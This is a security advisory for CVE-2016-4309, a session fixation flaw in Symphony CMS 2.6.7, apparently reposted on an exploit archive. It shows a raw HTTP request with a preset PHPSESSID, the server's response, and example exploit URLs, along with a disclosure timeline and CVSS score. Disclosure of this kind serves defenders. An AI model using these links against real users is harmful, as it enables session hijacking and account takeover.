Exploit for php platform in category web applications
[+] Credits: John Page aka hyp3rlinx
[+] ISR: APPARITIONSEC
Vendor:
====================
www.getsymphony.com
Product:
==================
Symphony CMS v2.6.7
Download:
http://www.getsymphony.com/download/
Symphony is a XSLT-powered open source content management system.
Vulnerability Type:
===================
Session Fixation
CVE Reference:
==============
CVE-2016-4309
Vulnerability Details:
=====================
Symphony CMS is prone to "Session Fixation" allowing attackers to preset a
users PHPSESSID "Session Identifier".
If the application is deployed using an insecure setup with PHP.INI
"session.use_only_cookies" not enabled, attackers can then send
victims a link to the vulnerable application with the "PHPSESSID" already
initialized as Symphony does not use or call
"session_regenerate_id()" upon successful user authentication.
Note: as per php.net/manual/en/session.configuration.php
"session.use_only_cookies=1" is default since PHP 4.3.0.
e.g.
"http://localhost/symphony/?PHPSESSID=APPARITION666".
As Symphonys Session ID is not regenerated it can result in arbitrary
Session ID being 'Fixated' to a user, if that user authenticates using
this attacker supplied session fixated link, the attacker can now access
the affected application from a different Computer/Browser
and have the same level of access to that of the victim. Default Cookie
lifetime for Symphony CMS is up to two weeks.
Reproduction steps:
=====================
Edit PHP.INI and change following settings to 'session.use_only_cookies=0'
if applicable, as POC test.
1) Telnet localhost 80
2) make HTTP request with a prefixed PHPSESSID
GET /symphony-2.6.7/symphony/?PHPSESSID=PWN3D666 HTTP/1.1
Host: localhost
Connection: close
3) Hit enter twice
HTTP/1.1 200 OK
Date: Mon, 16 May 2016 02:06:47 GMT
Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.6.8
X-Powered-By: PHP/5.6.8
Set-Cookie: PHPSESSID=PWNED666; expires=Mon, 30-May-2016 02:06:48 GMT;
Max-Age=1209600; path=/symphony-2.6.7; httponly
Content-Length: 1501
Connection: close
Content-Type: text/html; charset=UTF-8
Exploit code(s):
===============
1)
http://localhost/symphony-2.6.7/symphony/publish/articles/?PHPSESSID=hyp3rlinx
2) http://localhost/symphony-2.6.7/symphony/?PHPSESSID=APPARITION
Disclosure Timeline:
=====================================
Vendor Notification: May 3, 2016
Vendor Release Fix: May 23, 2016
June 20, 2016 : Public Disclosure.
Exploitation Method:
====================
Remote
Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
Description:
==============================================
Request Method(s): [+] GET / POST
Vulnerable Product: [+] Symphony CMS 2.6.7
Vulnerable Parameter(s): [+] 'PHPSESSID'
# 0day.today [2018-04-04] #